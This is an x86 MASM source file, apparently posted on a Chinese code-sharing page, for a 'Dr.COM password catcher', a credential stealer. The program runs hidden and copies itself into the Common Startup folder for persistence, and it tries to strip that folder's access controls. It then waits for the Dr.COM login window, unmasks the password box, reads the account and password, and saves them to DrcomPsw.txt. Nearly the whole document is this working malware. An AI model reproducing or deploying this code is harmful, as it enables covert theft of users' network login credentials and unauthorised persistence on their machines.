📄 getdrcompsw.asm
字号:
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; by 麦田的怪, http://blog.mtian.cn
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; GetDrcomPsw.asm
; Drcom密码捕获者
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.386
.model flat, stdcall
option casemap :none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 文件定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include Advapi32.inc
includelib Advapi32.lib
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Equ 等值定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
ID_TIMER equ 1
DLG_MAIN equ 1003h
IDC_SHOW equ 1004h
WM_HOOK equ WM_USER + 100h
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 数据段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.data
szClaStat db 'Static',0
szClaEdit db 'Edit',0
szTitAcc db '用户帐号',0
szTitPsw db ' 密 码 ',0
szLog db 'DrcomPsw.txt',0
szXie db '\',0
szExe db 'GetDrcomPsw.exe',0
szSelfDir db 156 dup(0)
lpsystem db 156 dup (0)
szSystem db 156 dup(0)
.data?
szBuffer db 256 dup (?)
Flag db ?
hInstance dd ?
hdrcom dd ?
hEditAcc dd ?
hEditPsw dd ?
hFile dd ?
hWinMain dd ?
szPsw db 255 dup(?)
szAcc db 255 dup(?)
szRegFold db 255 dup(?)
dwOption db ?
F_FIND equ 0001h
.const
szRegKey db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
szRegStart db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders',0
szRegCS db 'Common Startup',0
szRegValue db "GetDrcomPsw",0
szDestClass db '#32770',0 ;目标窗口的窗口类
szDrCaption db 'Dr.COM 用户认证程序',0
szLogtxt db '本文件由麦田Drcom密码捕获者生成',0dh,0ah
db '帐号:%s ',0dh,0ah
db '密码:%s ',0dh,0ah,0
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 代码段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;自启动
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_EnumKey proc
local @hKey
local @dwsize
local @hRegFold
invoke RegOpenKeyEx,HKEY_LOCAL_MACHINE,addr szRegStart,NULL,\
KEY_QUERY_VALUE,addr @hKey
.if eax == ERROR_SUCCESS
mov @dwsize,sizeof szRegFold
invoke RegQueryValueEx,@hKey,addr szRegCS,NULL,NULL,\
addr szRegFold,addr @dwsize
invoke RegCloseKey,@hKey
.endif
invoke CreateFile,addr szRegFold,FILE_ALL_ACCESS,FILE_SHARE_READ,\
NULL,OPEN_EXISTING,FILE_FLAG_BACKUP_SEMANTICS,addr @hRegFold
invoke SetSecurityInfo,addr @hRegFold,SE_FILE_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,NULL,NULL
invoke CloseHandle,addr @hRegFold
ret
_EnumKey endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;复制到系统目录
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_CopyToSystem proc
invoke GetModuleFileName,NULL,addr szSelfDir,200
;invoke GetSystemDirectory,addr lpsystem,50
;invoke lstrcat,addr szSystem,addr lpsystem ;串联字符
;invoke lstrcat,addr szSystem,addr szXie
;invoke lstrcat,addr szSystem,addr szExe;串联成完整路径
;invoke MessageBox,NULL,addr szSelfDir,addr szRegFold,MB_OK
invoke CopyFile,addr szSelfDir,addr szRegFold,FALSE
ret
_CopyToSystem endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;保存密码到DrcomPsw.txt文件
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_SavePass proc
local @szBuffer[68]:byte,@dwBytesWrite
invoke RtlZeroMemory,addr @szBuffer,sizeof @szBuffer
invoke wsprintf,addr @szBuffer,addr szLogtxt,addr szAcc,addr szPsw
invoke CreateFile,addr szLog,GENERIC_WRITE,FILE_SHARE_READ,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0
mov hFile,eax
invoke WriteFile,hFile,addr @szBuffer,68,addr @dwBytesWrite,NULL
invoke CloseHandle,hFile
xor eax, eax
ret
_SavePass endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 得到登陆窗口后的函数。
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_FindDrocm proc
.if hdrcom
invoke FindWindowEx,hdrcom,NULL,addr szClaStat,addr szTitAcc
.if eax
invoke FindWindowEx,hdrcom,eax,addr szClaEdit,NULL
mov hEditAcc,eax
invoke SendMessage, hEditAcc, WM_GETTEXT, 255, addr szAcc
.endif
invoke FindWindowEx,hdrcom,NULL,addr szClaStat,addr szTitPsw
.if eax
invoke FindWindowEx,hdrcom,eax,addr szClaEdit,NULL
mov hEditPsw,eax
invoke PostMessage,hEditPsw,EM_SETPASSWORDCHAR,0,0
invoke SendMessage, hEditPsw, WM_GETTEXT, 255, addr szPsw
.endif
.endif
xor eax, eax
ret
_FindDrocm endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 窗口过程
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_ProcWinMain proc uses ebx edi esi hWnd,uMsg,wParam,lParam
mov eax,uMsg
;********************************************************************
.if eax == WM_CREATE
invoke _EnumKey
invoke _CopyToSystem
invoke SetTimer,hWnd,ID_TIMER,100,NULL
.elseif eax == WM_TIMER
mov eax,wParam
.if eax == ID_TIMER
invoke FindWindow,addr szDestClass,addr szDrCaption
.if eax
mov hdrcom,eax
invoke _FindDrocm
or dwOption,F_FIND
.elseif
.if dwOption & F_FIND
invoke _SavePass
invoke KillTimer,hWnd,ID_TIMER
invoke DestroyWindow,hWinMain
invoke PostQuitMessage,NULL
.endif
.endif
.endif
;********************************************************************
.elseif eax == WM_CLOSE
invoke KillTimer,hWnd,ID_TIMER
invoke DestroyWindow,hWinMain
invoke PostQuitMessage,NULL
;********************************************************************
.else
invoke DefWindowProc,hWnd,uMsg,wParam,lParam
ret
.endif
;********************************************************************
xor eax,eax
ret
_ProcWinMain endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_WinMain proc
local @stWndClass:WNDCLASSEX
local @stMsg:MSG
invoke GetModuleHandle,NULL
mov hInstance,eax
invoke RtlZeroMemory,addr @stWndClass,sizeof @stWndClass
;********************************************************************
; 注册窗口类
;********************************************************************
invoke LoadCursor,0,IDC_ARROW
mov @stWndClass.hCursor,eax
push hInstance
pop @stWndClass.hInstance
mov @stWndClass.cbSize,sizeof WNDCLASSEX
mov @stWndClass.style,CS_HREDRAW or CS_VREDRAW
mov @stWndClass.lpfnWndProc,offset _ProcWinMain
mov @stWndClass.hbrBackground,COLOR_WINDOW + 1
mov @stWndClass.lpszClassName,offset szTitAcc
invoke RegisterClassEx,addr @stWndClass
;********************************************************************
; 建立并显示窗口
;********************************************************************
invoke CreateWindowEx,WS_EX_CLIENTEDGE,offset szTitAcc,offset szTitAcc,\
WS_OVERLAPPEDWINDOW,\
100,100,600,400,\
NULL,NULL,hInstance,NULL
mov hWinMain,eax
invoke ShowWindow,hWinMain,SW_HIDE
invoke UpdateWindow,hWinMain
;********************************************************************
; 消息循环
;********************************************************************
.while TRUE
invoke GetMessage,addr @stMsg,NULL,0,0
.break .if eax == 0
invoke TranslateMessage,addr @stMsg
invoke DispatchMessage,addr @stMsg
.endw
ret
_WinMain endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
start:
call _WinMain
invoke ExitProcess,NULL
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
end start
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -